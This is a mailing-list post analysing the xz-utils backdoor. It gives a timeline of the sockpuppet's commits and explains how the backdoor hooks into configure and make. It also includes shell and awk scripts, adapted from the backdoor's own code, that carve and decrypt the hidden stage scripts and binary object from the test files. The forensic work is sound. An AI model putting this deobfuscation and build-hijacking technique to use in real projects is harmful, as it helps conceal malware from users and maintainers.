Tomas Volf wrote:
On 2024-03-31 14:50:47 -0400, Eric Gallager wrote:
With a reproducible build system, multiple maintainers can "make dist"
and compare the output to cross-check for erroneous / malicious dist
environments.  Multiple signatures should be harder to compromise,
assuming each is independent and generally trustworthy.
This can only work if a package /has/ multiple active maintainers.
Well, other people besides the maintainers can also run `make dist`
and `make distcheck`. My idea was to get end-users in the habit of
running `make distcheck` themselves before installing stuff. And if
that's too much to ask of end users, I'd also point out that there are
multiple kinds of maintainer: besides the upstream maintainer, there
are also usually separate distro maintainers. Even if there's only 1
upstream maintainer, as was the case here, I still think that it would
be good to get distro maintainers in the habit of including `make
distcheck` as part of their own release process, before they accept
updates from upstream.

What would be helpful is if `make dist' would guarantee to produce the same
tarball (bit-to-bit) each time it is run, assuming the tooling is the same
version.  Currently I believe that is not the case (at least due to timestamps).
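
A minimal sketch of what a bit-for-bit repeatable tarball step might look like, outside of Automake's own dist rules. It assumes GNU tar 1.28 or later (for --sort) and gzip; the repro_tar name and the fallback timestamp of 0 are illustrative choices, not something `make dist' does today:

```shell
#!/bin/sh
# Pack a directory so that the result depends only on file names, contents
# and modes, not on timestamps, ownership, or directory traversal order.
# $1 = directory to archive, $2 = output .tar.gz (both names are up to the caller)
repro_tar () {
    tar --sort=name \
        --mtime="@${SOURCE_DATE_EPOCH:-0}" \
        --owner=0 --group=0 --numeric-owner \
        -cf - -C "$(dirname "$1")" "$(basename "$1")" \
      | gzip -n > "$2"
}
```

Two runs over the same tree should then produce identical files, which `cmp' can confirm, provided the tar and gzip versions are the same.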

A "tardiff" tool that ignores timestamps would be a solution to that problem, but not to this backdoor.

Combined with GNU Guix that would allow simple way to verify that `make dist'
was used, and the resulting artifact not tampered with, even without any central
signing.

The Guix "challenge" operation would not have detected this backdoor because *it* *was* *in* *the* *upstream* *release*. The build service works from that release tarball and you build from that same release tarball. GNU Guix ensures an equivalent build environment and your results *will* match---either the backdoor was not inserted or it was inserted in both builds.


The flow of the attack as I understand it was:

(0) (speculation on motivation) The attacker wanted a "Golden Key" to SSH and started looking for ways to backdoor sshd.
(1) The attacker starts a sockpuppet campaign and manages to get one of his sockpuppets appointed co-maintainer of xz-utils.
(2) [2023-06-27] The sockpuppet merges a pull request believed to be from another sockpuppet in commit ee44863ae88e377a5df10db007ba9bfadde3d314.
(3) [2024-02-15] The sockpuppet "updates m4/.gitignore" to add build-to-host.m4 to the list in commit 4323bc3e0c1e1d2037d5e670a3bf6633e8a3031e.
(4) [2024-02-23] The sockpuppet adds 5 files to the xz-utils testsuite in commit cf44e4b7f5dfdbf8c78aef377c10f71e274f63c0.
(5) [2024-03-08] To cover tracks, the sockpuppet finally adds a test using bad-3-corrupt_lzma2.xz in commit a3a29bbd5d86183fc7eae8f0182dace374e778d8.
(6) [2024-03-08] The sockpuppet revises two of those files with a lame excuse in commit a3a29bbd5d86183fc7eae8f0182dace374e778d8.
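
For anyone wanting to retrace steps 2 - 6, a small helper along these lines could print the author, date, subject, and touched files for each commit. It is only a sketch: the show_commits name is made up, and it assumes a Git clone of the repository (with history, not just an unpacked tarball) is available:

```shell
#!/bin/sh
# Print a one-line summary and the list of touched files for each commit.
# $1 = path to a clone of the repository, remaining arguments = commit IDs
show_commits () {
    repo=$1; shift
    for commit in "$@"; do
        git -C "$repo" show --no-patch --date=short \
            --format='%h %ad %an: %s' "$commit" || return 1
        git -C "$repo" show --format= --name-status "$commit"
    done
}

# Hypothetical usage, assuming the clone lives in ./xz-backdoored:
#   show_commits xz-backdoored \
#       4323bc3e0c1e1d2037d5e670a3bf6633e8a3031e \
#       cf44e4b7f5dfdbf8c78aef377c10f71e274f63c0
```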

The quick analysis of the Git history supporting steps 2 - 6 above has turned up another interesting detail: no version of configure.ac actually committed ever used the gl_BUILD_TO_HOST macro. An analysis found on pastebin noted that build-to-host.m4 is a dependency of gettext.m4. Following up on that, I found that commit 3adaddd73c8edcceaed059e859bd5262df65fc5a of 2023-02-18 in the GNU gettext repository introduced the use of gl_BUILD_TO_HOST, apparently as part of moving some existing path translation logic to gnulib and generalizing it for use elsewhere. This commit is innocent (it is *extremely* unlikely that Bruno Haible was involved in the backdoor campaign) and also explains why the backdoor was checking for "dnl Convert it to C string syntax." in m4/gettext.m4: that comment was removed in the same commit that switched to using gl_BUILD_TO_HOST. The change to gettext also occurred about a year before the sockpuppet began to take advantage of it.
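
One way to repeat this kind of check is Git's "pickaxe" search, which lists the commits that changed the number of occurrences of a string. The sketch below is an illustration only; macro_history is a made-up name and the repository paths in the usage comment are assumptions:

```shell
#!/bin/sh
# List commits (on any branch) that added or removed occurrences of a string.
# $1 = path to a clone, $2 = string to search for, remaining arguments = paths
macro_history () {
    repo=$1; needle=$2; shift 2
    git -C "$repo" log --all --oneline -S"$needle" -- "$@"
}

# Hypothetical usage; empty output from the first command would be consistent
# with no committed configure.ac ever having used the macro:
#   macro_history xz-backdoored gl_BUILD_TO_HOST configure.ac
#   macro_history gettext 'dnl Convert it to C string syntax.'
```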

It almost "feels like" the attacker was waiting for an opportunity to make plausible changes to autoconf macros and finally got one when updating the m4/ files for the 5.6.0 release. Could someone with the release tarballs confirm that m4/gettext.m4 was updated between v5.5.2beta and v5.6.0? I doubt the entire backdoor was developed in the week between those two commits. In fact, the timing around introducing ifuncs suggests to me that the binary blob was at least well into development by mid-2023.

The commit message at step 2 claims that using ifuncs with -fsanitize=address causes segfaults. If this is true generally, the glibc team should probably reconsider whether the abuse potential is worth the benefit of the feature and possibly investigate how the feature was introduced to glibc. If this was an excuse, it provided a clever way to prevent oss-fuzz from finding the backdoor, as disabling ifuncs provides a conveniently hidden flag to disable the backdoor.

While double-checking the above, I stumbled across another very suspicious commit in the repository: commit e446ab7a18abfde18f8d1cf02a914df72b1370e3 by Jia Tan on 2024-02-12 creating a separate "safe" range decoder mode because the next commit removes some bounds checks.

Lastly on this topic, some of the blame for this needs to fall on the systemd maintainers and their "katamari" architecture. There is no good reason for notifications of daemon startup to pull in liblzma, but using libsystemd for that purpose does exactly that, and ended up getting xz-utils targeted as a means of getting to sshd without the OpenSSH maintainers noticing.
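
Whether a given sshd is exposed to this dependency chain can be checked with ldd. The helper below is a sketch with a made-up name; the result depends entirely on how the distribution built and patched its sshd:

```shell
#!/bin/sh
# List the shared-library dependencies of a binary that match a pattern.
# $1 = path to the binary, $2 = extended regular expression
deps_matching () {
    ldd "$1" 2>/dev/null | grep -E "$2"
}

# Hypothetical usage; no output means neither library is pulled in:
#   deps_matching "$(command -v sshd)" 'libsystemd|liblzma'
```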


I have also done a bit more work and replicated extracting the backdoors from the repository. Here are scripts to extract them:

8<------ unpack-1.sh
#!/bin/sh

# Unpack first stage backdoor script from xz-backdoored.
# To guard against other trickery, use 7-zip for decompression.

set -x

tr "\t \-_" " \t_\-" \
 < xz-backdoored/tests/files/bad-3-corrupt_lzma2.xz \
 > backdoor-1.xz
7z l -slt backdoor-1.xz
7z e -y   backdoor-1.xz

# EOF
8<------
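
The tr invocation in unpack-1.sh is a plain byte swap: tab and space trade places, as do hyphen and underscore, so applying it twice gives back the original data. A small demonstration on harmless text (the swap_bytes name is only for illustration, and the escape handling assumed is that of GNU tr):

```shell
#!/bin/sh
# Same translation table as unpack-1.sh: tab <-> space, hyphen <-> underscore.
swap_bytes () {
    tr "\t \-_" " \t_\-"
}

printf 'a-b_c\n' | swap_bytes                 # prints: a_b-c
printf 'a-b_c\n' | swap_bytes | swap_bytes    # prints: a-b_c
```

This is why the test file looks corrupt to xz until the four byte values are swapped back.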

8<------ unpack-2a.sh
#!/bin/sh

# Unpack second stage backdoor script from xz-backdoored.
# To guard against other trickery, use 7-zip for decompression where possible.
# Adapted from original backdoor-1 script.

set -x

extract () (
 set +x # very noisy
 for cycle in 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16; do
   (head -c +1024 >/dev/null) && head -c +2048
 done
 (head -c +1024 >/dev/null) && head -c +939
)

7z e -so xz-backdoored/tests/files/good-large_compressed.lzma \
   | extract \
   | tail -c +31233 \
   | tr "\114-\321\322-\377\35-\47\14-\34\0-\13\50-\113" "\0-\377" \
   | tee backdoor-2a.lzma1 \
   | xz -F raw --lzma1 -dc \
   > backdoor-2a

# EOF
8<------
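
To make the byte accounting in unpack-2a.sh easier to follow, here is a sketch that reruns the same skip/keep pattern on a stream of zero bytes and does the arithmetic. It assumes a head that reads no more from a pipe than it was asked for (GNU head behaves this way); the variable names are illustrative:

```shell
#!/bin/sh
# Portable copy of extract(): 16 rounds of "skip 1024, keep 2048",
# then a final "skip 1024, keep 939".
extract () (
    for cycle in 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16; do
        (head -c 1024 >/dev/null) && head -c 2048
    done
    (head -c 1024 >/dev/null) && head -c 939
)

kept=$((16 * 2048 + 939))            # bytes that survive extract()
stage2a=$((kept - 31232))            # tail -c +31233 drops the first 31232
echo "kept=$kept stage2a=$stage2a"   # prints: kept=33707 stage2a=2475

# Cross-check the first number against a synthetic stream of zero bytes.
head -c 60000 /dev/zero | extract | wc -c

# The six tr ranges (octal) are disjoint; their lengths should add up to 256,
# which makes the tr step a one-to-one substitution over all byte values.
echo $(( (0321-0114+1) + (0377-0322+1) + (047-035+1) + (034-014+1) + (013-0+1) + (0113-050+1) ))   # prints: 256
```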

8<------ unpack-2b.sh
#!/bin/sh

# Unpack binary backdoor module from xz-backdoored.
# To guard against other trickery, use 7-zip for decompression where possible.
# Adapted from original backdoor scripts.

set -x

extract () (
 set +x # very noisy
 for cycle in 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16; do
   (head -c +1024 >/dev/null) && head -c +2048
 done
 (head -c +1024 >/dev/null) && head -c +939
)

7z e -so xz-backdoored/tests/files/good-large_compressed.lzma \
 | extract \
 | LC_ALL=C sed "s/\(.\)/\1\n/g" \
 | LC_ALL=C awk '
BEGIN {
   FS="\n"
   RS="\n"
   ORS=""

   m=256

   for (i=0;i<m;i++) {
        t[sprintf("x%c",i)]=i
        c[i]=((i*7)+5)%m
   }
   i=0; j=0

   for (l=0;l<8192;l++) {
        i=(i+1)%m; a=c[i]
        j=(j+a)%m; c[i]=c[j]; c[j]=a
   }
}

{
   v=t["x" (NF<1?RS:$1)]

   i=(i+1)%m; a=c[i]
   j=(j+a)%m; b=c[j]

   c[i]=b; c[j]=a

   k=c[(a+b)%m]

   printf "%c",(v+k)%m
}' \
 | tee backdoor-2b.xz \
 | xz -dc --single-stream \
 | ((head -c +0 >/dev/null 2>&1) && head -c +88664) \
 > backdoor-2b.o

# EOF
8<------
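
The awk program in unpack-2b.sh reads like an RC4-style keystream generator with two twists: there is no key (the state starts as (i*7+5) mod 256 and is stirred for 8192 rounds), and the keystream is added to each byte modulo 256 rather than XORed. The sketch below isolates that logic and works on decimal byte values, one per line, to sidestep binary I/O in awk. The keystream_apply name and the subtracting direction are additions for illustration, not part of the original scripts:

```shell
#!/bin/sh
# Apply the unpack-2b.sh keystream to decimal byte values, one per line.
# $1 = 1 adds the keystream (what the awk program in unpack-2b.sh does),
# $1 = -1 subtracts it (the inverse operation, added here for the demo).
keystream_apply () {
    awk -v sign="$1" '
    BEGIN {
        m = 256
        for (i = 0; i < m; i++) c[i] = ((i * 7) + 5) % m  # fixed start state, no key
        i = 0; j = 0
        for (l = 0; l < 8192; l++) {                      # warm-up rounds, output discarded
            i = (i + 1) % m; a = c[i]
            j = (j + a) % m; c[i] = c[j]; c[j] = a
        }
    }
    {
        i = (i + 1) % m; a = c[i]
        j = (j + a) % m; b = c[j]
        c[i] = b; c[j] = a
        k = c[(a + b) % m]                                # next keystream byte
        print ($1 + sign * k + m) % m
    }'
}

# Round trip: subtract the keystream, then add it back.
printf '%s\n' 72 105 0 255 | keystream_apply -1 | keystream_apply 1
# prints 72, 105, 0, 255 (one per line)
```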

The above scripts assume that the backdoored code has been unpacked into xz-backdoored in the current directory. As you can see by reading them, they fetch the backdoor code from the tests/files/bad-3-corrupt_lzma2.xz and tests/files/good-large_compressed.lzma files.

The unpack-1 and unpack-2a scripts yield the shell script backdoor code, while the unpack-2b script yields the binary object that was hidden in the repository.

All backdoor-1 does is unpack and execute backdoor-2a.

Emacs makes short work (make the region span the file; C-M-\) of indenting the backdoor-2a code, which makes the control flow clear and helps to explain how this worked. The backdoor-2a script is run twice. The first run happens as part of configure (possibly config.status actually) and modifies src/liblzma/Makefile to unpack and run the backdoor-1 script again, using the am__dist_setup, am__test_dir, and am__strip_prefix variables to hide the commands that unpack and run backdoor-1. The second run happens during make and actually unpacks the backdoor. My previous conclusion that an unreasonably observant user might notice make not building the two affected objects is wrong---make builds them first, and the backdoor script then rebuilds them to include and call the hidden binary object. Also, it seems that config.status somehow gets deleted during the build, since backdoor-2a uses an if/elif/fi sequence to determine whether to alter src/liblzma/Makefile or apply the hidden object. This is odd but does not impede recovering the backdoor artifacts.


-- Jacob

